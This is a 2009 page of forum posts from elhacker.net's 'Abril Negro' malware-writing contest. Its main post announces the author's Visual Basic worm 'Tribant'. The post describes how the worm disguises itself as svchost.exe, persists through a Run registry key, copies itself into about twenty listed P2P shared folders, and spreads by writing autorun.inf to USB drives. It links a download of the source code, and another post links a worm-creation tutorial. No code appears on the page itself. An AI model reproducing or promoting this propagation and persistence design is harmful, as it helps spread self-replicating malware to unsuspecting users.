elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Seguridad Informática / Abril negro / Re: [Abril Negro 2009] Concurso de desarrollo de malware en: 26 Abril 2009, 02:44 am
y porque pusiste solo dos ?
que pasa con los otros? como el mio :huh: :huh:
22  Seguridad Informática / Abril negro / Re: Ghost SMF (Version 1.2) by WHK (Proyecto solo para "Abril Negro") en: 26 Abril 2009, 02:13 am
jejeje, ya descubri como hacerlo en vb  ;D ;D :rolleyes: :rolleyes: :silbar: :silbar: :silbar: :¬¬ :¬¬
voy a hacer lo mismo q vos, Jubjub.
23  Seguridad Informática / Abril negro / Re: Gusano Tribant (p2p y usb) by Dober-ManN [Abril Negro] en: 26 Abril 2009, 01:56 am
Aqui hay un tuto muy bueno: http://es.geocities.com/cusacoxa/Creacion_de_Worms_VB_by_Hendrix.zip
24  Seguridad Informática / Abril negro / Re: Gusano Tribant (p2p y usb) by Dober-ManN [Abril Negro] en: 25 Abril 2009, 18:06 pm
jejeje, no es mala idea. :rolleyes:
25  Seguridad Informática / Abril negro / Re: Ghost SMF (Version 1.2) by WHK (Proyecto solo para "Abril Negro") en: 25 Abril 2009, 18:04 pm
donde esta e4l codigo fuente del programa??? :huh:
26  Seguridad Informática / Abril negro / Re: Gusano Tribant (p2p y usb) by Dober-ManN [Abril Negro] en: 25 Abril 2009, 17:38 pm
Gracias Karcrack. Yo comenze a programar hace como dos meses (con la revista de hackxcrack) ;D. Por lo del tamaño del worm, ¿cual es el problema?
A medida que vaya aprendiendo, lo ire modificandolo, pero por ahora lo dejare como esta.
Gracias
27  Seguridad Informática / Abril negro / Re: Gusano Tribant (p2p y usb) by Dober-ManN [Abril Negro] en: 25 Abril 2009, 04:54 am
Bueno, se que tiene mucho codigo basura, PERO NO OLVIDEMOS QUE AUN SOY NOVATO  :huh: . Y es lo que supe hacer, aun hay miles de cosas que no entiendo, y para mi, cuando se trata de propagacion P2P, cuanto mas pese, mejor.
Gracias por los comentarios. ;D
SUERTE
28  Seguridad Informática / Abril negro / Gusano Tribant (p2p y usb) by Dober-ManN [Abril Negro] en: 25 Abril 2009, 01:47 am
Hola a todos. Queria presentar mi Worm para Abril Negro. Se llama Tribant y esta programado en Visual Basic 6. Cualquier duda, comenten.


Tribant


Nombre: Tribant
Tamaño del virus: 104Kb
Nombre Tecnico: W32-TRIBANT.VB worm
Tipo: Gusano
Propagacion: P2P y USB.
Autor: Dober-ManN
Programado en: Visual Basic 6


EFECTOS:

Al abrirce, verifica si se encuentra infectada la PC victima, si no lo esta, se copia a "%windir%\svchost.exe".
Cambia sus propiedades a: _Solo lectura.
                                           _Oculto.
                                           _Archivo del sistema.

Se agrega al registro en "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost" para iniciarce con el sistema.
Ejecuta el archivo "%windir%\svchost.exe", luego se autocierra y comienza la propagacion.


PROPAGACION P2P:

Para la propagacion P2P, analiza todas las carpetas compartidas de los programas P2P en busca de archivos.

Extrae los nombre de estos archivos y se autocopia con estos nombres en todas la carpetas compartidas de los programas P2P.

Carpetas de los programas P2P en los que funciona este gusano: C:\Archivos de programa\Grokster\My Grokster\
                                                                                               C:\Archivos de programa\Morpheus\My Shared Folder\
                                                                                               C:\Archivos de programa\ICQ\shared files\
                                                                                               C:\Archivos de programa\KaZaA\My Shared Folder\
                                                                                               C:\Archivos de programa\KaZaA Lite\My Shared Folder\
                                                                                               C:\Archivos de programa\EDONKEY2000\incoming\
                                                                                               C:\Archivos de programa\eMule\Incoming\
                                                                                               C:\Archivos de programa\Filetopia3\Files\
                                                                                               C:\Archivos de programa\appleJuice\incoming\
                                                                                               C:\Archivos de programa\Gnucleus\Downloads\
                                                                                               C:\Archivos de programa\LimeWire\Shared\
                                                                                               C:\Archivos de programa\Overnet\incoming\
                                                                                               C:\Archivos de programa\Shareaza\Downloads\
                                                                                               C:\Archivos de programa\Swaptor\Download\
                                                                                               C:\Archivos de programa\WinMX\My Shared Folder\
                                                                                               C:\Archivos de programa\Tesla\Files\
                                                                                               C:\Archivos de programa\XoloX\Downloads\
                                                                                               C:\Archivos de programa\Rapigator\Share\
                                                                                               C:\Archivos de programa\KMD\My Shared Folder\
                                                                                               C:\Archivos de programa\BearShare\Shared\
                                                                                               C:\Archivos de programa\Direct Connect\Received Files\




PROPAGACION USB:

Para la propagacion USB, se autocopia con el nombre de "system.exe" y crea el archivo "autorun.inf" en las unidades desde la E:\ hasta la Z:\ cada 5s.
Cambia las propiedades del los archivos "autorun.inf" y "system.exe" a: _Solo lectura.
                                                                                                          _Oculto.
                                                                                                          _Archivo del sistema.





Este gusano no tiene rutina destructiva  :silbar: (jeje, en serio, no la tiene), solo se propaga por USB y por P2P como cualquier gusano. Cualquier cosa, el codigo fuente esta completamente explicado paso por paso. Espero que les guste:

LINK DE DESCARGA: http://www.4shared.com/file/101402829/1188bee4/TRIBANT.html

SALUDOS y COMENTEN  ;D
29  Seguridad Informática / Abril negro / Re: [Abril Negro 2009] Concurso de desarrollo de malware en: 22 Abril 2009, 00:47 am
ostia... que casualidad, justo ayer hice un programa y a causa de un error colapse el disco duro al ejecutarlo...

Podria presentarlo, aunque no sea un virus en sí, verdad?xD
si, si lo podes presentar, porque es una "HERRAMIENTA". NO? :silbar:
30  Seguridad Informática / Abril negro / Re: [Abril Negro 2009] Concurso de desarrollo de malware en: 21 Abril 2009, 02:48 am
Mi problema es que aun no les puse nombre a mis diablillos :-(
NO SE ME OCURRE NINGUNO!!!!   :-\ :huh: :-( >:(
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines